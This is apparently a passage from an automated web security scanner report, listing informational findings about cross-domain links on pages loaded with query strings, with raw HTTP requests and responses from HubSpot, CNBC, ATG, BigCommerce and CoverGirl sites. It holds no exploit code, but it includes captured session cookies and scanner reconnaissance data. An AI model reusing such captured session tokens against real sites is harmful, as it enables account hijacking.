<span class="headline"><a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=85%2C125%2C1&t=11">Your Brain is Starving</a></span>
<a onclick="javascript:trackClick(125, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=https://crm.directdigitalllc.com/click?a=125&b=26&p=85%2C125%2C1&t=11">You must see this terrifying brain secret before it's too late... <br />
...[SNIP]...
<td id="adimage" class="adimage" align="left">
<a onclick="javascript:trackClick(1, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=https://crm.directdigitalllc.com/click?a=1&b=26&p=85%2C125%2C1&t=11"><img border="0" src="http://c1142172.cdn.cloudfiles.rackspacecloud.com/100x75/803znrzpc6.jpg"></a>
...[SNIP]...
<span class="headline"><a onclick="javascript:trackClick(1, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=https://crm.directdigitalllc.com/click?a=1&b=26&p=85%2C125%2C1&t=11">How to Relieve Joints?</a></span>
<a onclick="javascript:trackClick(1, 26);"target="_blank" href="http://yads.zedo.com/ads2/c?a=906408;n=1197;x=2304;c=1197000038,1197000038;g=172;i=0;1=8;2=1;s=2;g=172;m=82;w=47;i=0;u=unknown;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=18715440=_4e66453e,4157733387,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=18715440/optn=64?trg=https://crm.directdigitalllc.com/click?a=1&b=26&p=85%2C125%2C1&t=11">Shocking Discovery by Boston Researchers for Amazing Joint Relief... <br />
...[SNIP]...

19.71. http://sophelle.web5.hubspot.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sophelle.web5.hubspot.com
Path:	/Default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://sophelle.web5.hubspot.com/Default.aspx?app=iframeform&hidemenu=true&ContactFormID=26423

The response contains the following link to another domain:

http://www.sophelle.com/products/cq/thank-you-trial.html

Request

POST /Default.aspx?app=iframeform&hidemenu=true&ContactFormID=26423 HTTP/1.1
Host: sophelle.web5.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Products/CQ/free-trial.html
Content-Length: 1030
Cache-Control: max-age=0
Origin: http://www.sophelle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=5iCeoaShzAEkAAAAZTQ1M2FhMjItYzUyOS00Njk1LWExNWEtYzg1MmNiNDE2NGZh0; ASP.NET_SessionId=ywiv3nvqvyjcg5bljy1p2zeg; HUBSPOT19980=537990316.0.0000

FormSubmitRedirectURL=http%3A%2F%2Fwww.sophelle.com%2Fproducts%2Fcq%2Fthank-you-trial.html&Lead_Src=Free+Trial+Long+Form+%7C+Contact+Us&LeadGen_ContactForm_26423_m0submitter_user_token=9c6ca7a5ca1546b
...[SNIP]...

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 15:28:24 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.sophelle.com/products/cq/thank-you-trial.html
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 173

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.sophelle.com/products/cq/thank-you-trial.html">here</a>.</h2>
</body></html>

19.72. http://sophelle.web5.hubspot.com/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sophelle.web5.hubspot.com
Path:	/Default.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://sophelle.web5.hubspot.com/Default.aspx?app=iframeform&hidemenu=true&ContactFormID=14884

The response contains the following link to another domain:

http://www.sophelle.com/Contact-Us/thank-you.html

Request

POST /Default.aspx?app=iframeform&hidemenu=true&ContactFormID=14884 HTTP/1.1
Host: sophelle.web5.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Contact-Us/
Content-Length: 1008
Cache-Control: max-age=0
Origin: http://www.sophelle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=5iCeoaShzAEkAAAAZTQ1M2FhMjItYzUyOS00Njk1LWExNWEtYzg1MmNiNDE2NGZh0

FormSubmitRedirectURL=http%3A%2F%2Fwww.sophelle.com%2FContact-Us%2Fthank-you.html&Lead_Src=Contact+Us+%7C+Contact+Us&LeadGen_ContactForm_14884_m0submitter_user_token=9c6ca7a5ca1546b9a6b60f57cca70bb6&C
...[SNIP]...

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 15:28:01 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.sophelle.com/Contact-Us/thank-you.html
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 166

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.sophelle.com/Contact-Us/thank-you.html">here</a>.</h2>
</body></html>

19.73. http://thinkwrap.com/wp-content/themes/vision/library/media/js/jquery.prettyPhoto.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://thinkwrap.com
Path:	/wp-content/themes/vision/library/media/js/jquery.prettyPhoto.js

Issue detail

The page was loaded from a URL containing a query string:

http://thinkwrap.com/wp-content/themes/vision/library/media/js/jquery.prettyPhoto.js?ver=2.9.2

The response contains the following links to other domains:

http://www.apple.com/qtactivex/qtplugin.cab
http://www.youtube.com/v/'+grab_param('v',images[setPosition])+'

Request

GET /wp-content/themes/vision/library/media/js/jquery.prettyPhoto.js?ver=2.9.2 HTTP/1.1
Host: thinkwrap.com
Proxy-Connection: keep-alive
Referer: http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:36 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Mon, 23 Aug 2010 11:42:00 GMT
ETag: "1a1d0-3c27-48e7c22eeb200"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 15399
Content-Type: application/javascript

(function($){$.prettyPhoto={version:'2.5.4'};$.fn.prettyPhoto=function(settings){settings=jQuery.extend({animationSpeed:'normal',padding:40,opacity:0.80,showTitle:true,allowresize:true,counter_separa
...[SNIP]...
<param name="movie" value="http://www.youtube.com/v/'+grab_param('v',images[setPosition])+'" /><embed src="http://www.youtube.com/v/'+grab_param('v',images[setPosition])+'" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="'+correctSizes['width']+'" height="'+correctSizes['height']+'"></embed></object>';}else if(pp_type=='quicktime'){pp_typeMarkup='<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" codebase="http://www.apple.com/qtactivex/qtplugin.cab" height="'+correctSizes['height']+'" width="'+correctSizes['width']+'"><param name="src" value="'+images[setPosition]+'">
...[SNIP]...

19.74. http://ticker.cnbc.com/scripts/cnbc_ticker.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ticker.cnbc.com
Path:	/scripts/cnbc_ticker.js

Issue detail

The page was loaded from a URL containing a query string:

http://ticker.cnbc.com/scripts/cnbc_ticker.js?v=C0950

The response contains the following link to another domain:

http://m1.2mdn.net/879366/imp_01_17.swf?uagent='+navigator.userAgent+'

Request

GET /scripts/cnbc_ticker.js?v=C0950 HTTP/1.1
Host: ticker.cnbc.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Fri, 28 Aug 2009 14:56:14 GMT
ETag: "6c6b-47234e2b19f80"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 27755
Cache-Control: max-age=86400
Date: Tue, 06 Sep 2011 15:00:12 GMT
Connection: close

var isIE=navigator.appName.indexOf("Microsoft")>-1;var saved_cnbc_video_setURL=null;var cnbc_MONTH_NAMES=new Array('January','February','March','April','May','June','July','August','September','Octo
...[SNIP]...
<param name="allowScriptAccess" value="always" />'+'<embed id="'+variableName+'" name="'+variableName+'" play="true" src="http://m1.2mdn.net/879366/imp_01_17.swf?uagent='+navigator.userAgent+'" AllowScriptAccess="always" quality="high" bgcolor="#ffffff" width="1" height="1" align="middle" type="application/x-shockwave-flash" /></object>
...[SNIP]...
<param name="movie" value="http://m1.2mdn.net/879366/imp_01_17.swf?uagent='+navigator.userAgent+'" />');document.write('<embed id="'+varName+'" name="'+varName+'" play="true" src="http://m1.2mdn.net/879366/imp_01_17.swf?uagent='+navigator.userAgent+'" AllowScriptAccess="always" quality="high" bgcolor="#ffffff" width="1" height="1" align="middle" type="application/x-shockwave-flash" />');document.write('</object>
...[SNIP]...

19.75. http://www.atg.com/service/main.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atg.com
Path:	/service/main.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.atg.com/service/main.jsp?t=searchTab&dosearch=true&SearchButton=Find&searchstring=xss+faq+help&search=GO

The response contains the following link to another domain:

https://ssl.google-analytics.com/urchin.js

Request

GET /service/main.jsp?t=searchTab&dosearch=true&SearchButton=Find&searchstring=xss+faq+help&search=GO HTTP/1.1
Host: www.atg.com
Proxy-Connection: keep-alive
Referer: http://www.atg.com/en/solutions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22; __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295

Response

19.76. https://www.atg.com/en/password/request/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.atg.com
Path:	/en/password/request/

Issue detail

The page was loaded from a URL containing a query string:

https://www.atg.com/en/password/request/?successURL=/en/password/request/success/&_requestid=161697

The response contains the following link to another domain:

https://static.atgsvcs.com/js/atgsvcs.js

Request

GET /en/password/request/?successURL=/en/password/request/success/&_requestid=161697 HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: https://www.atg.com/en/password/request/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

19.77. https://www.atg.com/service/main.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.atg.com
Path:	/service/main.jsp

Issue detail

The page was loaded from a URL containing a query string:

https://www.atg.com/service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8

The response contains the following link to another domain:

https://ssl.google-analytics.com/urchin.js

Request

Response

19.78. http://www.bigcommerce.com/lp/e1-lp-ecommerce.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigcommerce.com
Path:	/lp/e1-lp-ecommerce.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.bigcommerce.com/lp/e1-lp-ecommerce.php?ga_campaign=(roi)+ecommerce&ga_adgroup=ecommerce+solutions&ga_keyword=e+commerce+solutions&gclid=CI2H3L74iKsCFRE9gwodYgUI1Q

The response contains the following links to other domains:

https://secure.leadback.advertising.com/adcedge/lb?site=695501&betr=bigcommerce_cs=[+]1[720],3[8760]
https://seg.sharethis.com/socialOptimizationPixel.php?campaign=RT-bigcommerce
https://www.googleadservices.com/pagead/conversion.js
https://www.googleadservices.com/pagead/conversion/1031608255/?label=_lLiCJXWjQIQv6_06wM&guid=ON&script=0

Request

GET /lp/e1-lp-ecommerce.php?ga_campaign=(roi)+ecommerce&ga_adgroup=ecommerce+solutions&ga_keyword=e+commerce+solutions&gclid=CI2H3L74iKsCFRE9gwodYgUI1Q HTTP/1.1
Host: www.bigcommerce.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6564
Connection: close
Content-Type: text/html

<html>
<head>

<script type="text/javascript" src="https://www.bigcommerce.com/js/gascript.js?
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1031608255/?label=_lLiCJXWjQIQv6_06wM&guid=ON&script=0"/>
</div>
...[SNIP]...

<img src="https://secure.leadback.advertising.com/adcedge/lb?site=695501&betr=bigcommerce_cs=[+]1[720],3[8760]" width="1" height="1" border="0">

<img height="1" width="1" style="border-style:none;" alt="" src="https://seg.sharethis.com/socialOptimizationPixel.php?campaign=RT-bigcommerce"/>


...[SNIP]...

19.79. http://www.cnbc.com/js/cnbc_quote_components.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/js/cnbc_quote_components.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.cnbc.com/js/cnbc_quote_components.js?rti=201008

The response contains the following link to another domain:

http://java.sun.com/update/1.5.0/jinstall-1_5_0-windows-i586.cab

Request

GET /js/cnbc_quote_components.js?rti=201008 HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-300; adops_master_kvs=; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; s_cc=true; xaikeeperua=yes; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e084iWrP3zZjGLW8rjUsginb4%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FjEBYL11GHn8=

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 17:17:01 GMT
Via: 1.1 C aicache6
Content-Length: 155345
X-Aicache-OS: 207.46.150.45:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 17:17:01 GMT

var cnbc_mrq_numElements=5;var cnbc_mrq_expiration_hours=24;var cnbc_mrq_baseCookieName='cnbc_most_recent_quotes';var cnbc_mrq_baseDivId='cnbc_most_recent_symbol_';var cnbc_mrq_symbols_getDataQueue;
...[SNIP]...
<div style="margin-left:5px;">';html+='<OBJECT Name="CNBC chart" Width="200" Height="175" codebase="http://java.sun.com/update/1.5.0/jinstall-1_5_0-windows-i586.cab#Version=1,5,0" classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" MAYSCRIPT="" >';html+='<PARAM NAME="Archive" VALUE="http://'+server+'/api/tickbytick/cnbc.jar"/>
...[SNIP]...

19.80. http://www.covergirl.com/__utm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.covergirl.com
Path:	/__utm.gif

Issue detail

The page was loaded from a URL containing a query string:

http://www.covergirl.com/__utm.gif?utmwv=5.1.5&utms=1&utmn=781314454&utmhn=www.covergirl.com&utmcs=UTF-8&utmsr=1920x1200&utmsc=16-bit&utmul=en-us&utmje=1&utmfl=10.3%20r183&utmdt=Beauty%20Products%20from%20COVERGIRL&utmhid=790143979&utmr=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DDirect%2BBeauty%2BProduct&utmp=%2Fbeauty-products%3Futm_source%3Dgoogle%26utm_medium%3Dcpc%26utm_term%3D%25252Bbeauty%252520%25252Bproducts%26utm_campaign%3DCG%2BEvergreen%2BGKW%2B-%2B1011%2B-%2BBMM%26utm_content%3Ds9xEppg8V%257C7750439198

The response contains the following links to other domains:

http://fls.doubleclick.net/activityi;src=3232132;type=homep318;cat=us_12879;ord=1?
http://www.bbbonline.org/cks.asp?id=292000103
http://www.bhg.com/health-family/mind-body-spirit/beauty/bnpa-beauty-health
http://www.covergirl.ca/en_ca/
http://www.facebook.com/covergirl
http://www.facebook.com/covergirl?sk=app_160134610689223
http://www.pg.com/news/index.jhtml
http://www.pg.com/privacy/english/privacy_notice.html
http://www.pg.com/terms.html
http://www.twitter.com/covergirl
http://www.youtube.com/covergirl
https://js.revsci.net/gateway/gw.js?csid=F09828

Request

GET /__utm.gif?utmwv=5.1.5&utms=1&utmn=781314454&utmhn=www.covergirl.com&utmcs=UTF-8&utmsr=1920x1200&utmsc=16-bit&utmul=en-us&utmje=1&utmfl=10.3%20r183&utmdt=Beauty%20Products%20from%20COVERGIRL&utmhid=790143979&utmr=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DDirect%2BBeauty%2BProduct&utmp=%2Fbeauty-products%3Futm_source%3Dgoogle%26utm_medium%3Dcpc%26utm_term%3D%25252Bbeauty%252520%25252Bproducts%26utm_campaign%3DCG%2BEvergreen%2BGKW%2B-%2B1011%2B-%2BBMM%26utm_content%3Ds9xEppg8V%257C7750439198 HTTP/1.1
Host: www.covergirl.com
Proxy-Connection: keep-alive
Referer: http://www.covergirl.com/beauty-products?utm_source=google&utm_medium=cpc&utm_term=%2Bbeauty%20%2Bproducts&utm_campaign=CG+Evergreen+GKW+-+1011+-+BMM&utm_content=s9xEppg8V|7750439198
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=kmi5afnggj2ugc45ntt0nzzx; sifrFetch=true; __utma=214218501.640054455.1315345533.1315345533.1315345533.2; __utmb=214218501.1.10.1315345533; __utmc=214218501; __utmz=214218501.1315345533.2.2.utmcsr=google|utmccn=CG%20Evergreen%20GKW%20-%201011%20-%20BMM|utmcmd=cpc|utmctr=%20beauty%20%20products|utmcct=s9xEppg8V|7750439198

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:37 GMT
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 63408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en-us">
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=3232132;type=homep318;cat=us_12879;ord=1?" width="1" height="1" frameborder="0" style="display:none"></iframe>
...[SNIP]...
<p style="margin-top: 17px; text-align: right; width: 457px;"><a href="http://www.facebook.com/covergirl?sk=app_160134610689223" class="buttonlink">          GO NOW          </a>
...[SNIP]...
</p>

<a id="ctl00_MainContent_hypCallOut1Link" class="calltoaction" href="http://www.bhg.com/health-family/mind-body-spirit/beauty/bnpa-beauty-health">SEE THE WINNERS</a>
...[SNIP]...
<img src="/Images/logo_bbb.gif" width="22" height="35" alt="Better Business Bureau"
class="bbb" />-->
<a id="ctl00_hypFooterLogo" href="http://www.bbbonline.org/cks.asp?id=292000103" target="_blank"><img id="ctl00_imgFooterLogo" class="bbb" src="/images/en-US/navigation/logo_bbb.gif" style="height:35px;width:22px;border-width:0px;" />
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl01_liFooterLink">
<a id="ctl00_rptFooterLinks_ctl01_hypFooterElements" href="http://www.pg.com/terms.html" target="_blank">Terms & Conditions</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl02_liFooterLink">
<a id="ctl00_rptFooterLinks_ctl02_hypFooterElements" href="http://www.pg.com/privacy/english/privacy_notice.html" target="_blank">Privacy Statement</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl03_liFooterLink">
<a id="ctl00_rptFooterLinks_ctl03_hypFooterElements" href="http://www.pg.com/news/index.jhtml" target="_blank">Press</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl04_liFooterLink">
<a id="ctl00_rptFooterLinks_ctl04_hypFooterElements" href="http://www.covergirl.ca/en_ca/" target="_blank">Canada Site</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl09_liFooterLink" class="facebook">
<a id="ctl00_rptFooterLinks_ctl09_hypFooterElements" href="http://www.facebook.com/covergirl" target="_blank">Facebook</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl10_liFooterLink" class="youtube">
<a id="ctl00_rptFooterLinks_ctl10_hypFooterElements" href="http://www.youtube.com/covergirl" target="_blank">YouTube</a>
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl11_liFooterLink" class="twitter last">
<a id="ctl00_rptFooterLinks_ctl11_hypFooterElements" href="http://www.twitter.com/covergirl" target="_blank">Twitter</a>
...[SNIP]...
</script>

<script type="text/javascript" src="https://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

19.81. http://www.covergirl.com/beauty-products previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.covergirl.com
Path:	/beauty-products

Issue detail

The page was loaded from a URL containing a query string:

http://www.covergirl.com/beauty-products?utm_source=google&utm_medium=cpc&utm_term=%2Bbeauty%20%2Bproducts&utm_campaign=CG+Evergreen+GKW+-+1011+-+BMM&utm_content=s9xEppg8V|7750439198

The response contains the following links to other domains:

http://fls.doubleclick.net/activityi;src=3232132;type=produ790;cat=us_12493;ord=1?
http://www.bbbonline.org/cks.asp?id=292000103
http://www.covergirl.ca/en_ca/
http://www.facebook.com/covergirl
http://www.pg.com/news/index.jhtml
http://www.pg.com/privacy/english/privacy_notice.html
http://www.pg.com/terms.html
http://www.twitter.com/covergirl
http://www.youtube.com/covergirl
https://js.revsci.net/gateway/gw.js?csid=F09828

Request

GET /beauty-products?utm_source=google&utm_medium=cpc&utm_term=%2Bbeauty%20%2Bproducts&utm_campaign=CG+Evergreen+GKW+-+1011+-+BMM&utm_content=s9xEppg8V|7750439198 HTTP/1.1
Host: www.covergirl.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:27 GMT
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en-us">
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=3232132;type=produ790;cat=us_12493;ord=1?" width="1" height="1" frameborder="0" style="display:none"></iframe>
...[SNIP]...
<img src="/Images/logo_bbb.gif" width="22" height="35" alt="Better Business Bureau"
class="bbb" />-->
<a id="ctl00_hypFooterLogo" href="http://www.bbbonline.org/cks.asp?id=292000103" target="_blank"><img id="ctl00_imgFooterLogo" class="bbb" src="/images/en-US/navigation/logo_bbb.gif" style="height:35px;width:22px;border-width:0px;" />
...[SNIP]...
<li id="ctl00_rptFooterLinks_ctl01_liFooterLink">
